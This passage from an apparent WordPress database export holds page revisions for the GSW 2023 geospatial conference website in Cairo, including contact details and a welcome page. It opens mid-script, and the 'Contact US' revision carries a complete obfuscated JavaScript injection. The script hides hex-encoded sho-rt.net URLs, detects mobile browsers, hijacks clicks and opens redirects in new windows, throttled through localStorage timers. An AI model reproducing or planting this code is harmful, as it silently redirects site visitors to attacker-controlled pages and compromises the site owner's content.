_0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','MMT and HD Maps - Mobile Mapping Technologies and HD Maps','','inherit','closed','closed','','2095-revision-v1','','','2022-10-07 23:13:09','2022-10-07 23:13:09','',2095,'https://gsw2023.com/?p=2621',0,'revision','',0),
(2622,1,'2022-10-07 23:28:16','2022-10-07 23:28:16','[vc_row equal_height=\"yes\" content_placement=\"top\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529513148816{padding-top: 70px !important;padding-bottom: 30px !important;}\"][vc_column offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Get In Touch!\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\" margin_design_tab_text=\"\"][/ultimate_heading][/vc_column][vc_column][vc_row_inner equal_height=\"yes\" content_placement=\"top\"][vc_column_inner width=\"1/2\" css=\".vc_custom_1491746397816{padding-bottom: 50px !important;}\"][dt_fancy_image image_id=\"2364\" onclick=\"custom_link\" image_link=\"https://www.google.com/maps/@30.043056,31.232,16z?hl=en\" custom_link_target=\"_blank\" width=\"600\" css=\".vc_custom_1665134722899{padding-bottom: 30px !important;}\"][vc_column_text css=\".vc_custom_1665135195655{padding-bottom: 20px !important;}\"]\r\n<p style=\"text-align: center;\"><strong>Arab Academy for Science, Technology and Maritime Transport</strong>\r\nWe\'d love to hear from you and this is how you can reach us...</p>\r\n[/vc_column_text][vc_column_text css=\".vc_custom_1665135234836{padding-bottom: 20px !important;}\"]\r\n<p style=\"text-align: center;\"><span style=\"color: #333333;\"><strong>CALL US</strong></span>\r\n2(012) 1000-7979</p>\r\n[/vc_column_text][vc_column_text]\r\n<p style=\"text-align: center;\"><span style=\"color: #333333;\"><strong>MAIL</strong></span>\r\ninfo@gsw2023.com</p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\" css=\".vc_custom_1491746388981{padding-bottom: 50px !important;}\"][dt_contact_form fields=\"name,email,telephone,country,message\" message_height=\"9\" required=\"name,email,telephone,country,message\" terms=\"y\" terms_msg=\"QnklMjB1c2luZyUyMHRoaXMlMjBmb3JtJTIweW91JTIwYWdyZWUlMjB3aXRoJTIwdGhlJTIwc3RvcmFnZSUyMGFuZCUyMGhhbmRsaW5nJTIwb2YlMjB5b3VyJTIwZGF0YSUyMGJ5JTIwdGhpcyUyMHdlYnNpdGUu\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Contact US','','inherit','closed','closed','','53-revision-v1','','','2022-10-07 23:28:16','2022-10-07 23:28:16','',53,'https://gsw2023.com/?p=2622',0,'revision','',0),
(2623,1,'2022-10-08 23:51:10','2022-10-08 23:51:10','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\"][vc_column_inner width=\"1/2\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/2\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm.gsw2023.com%2Fpages%2Fregistration.html\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182820572{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT 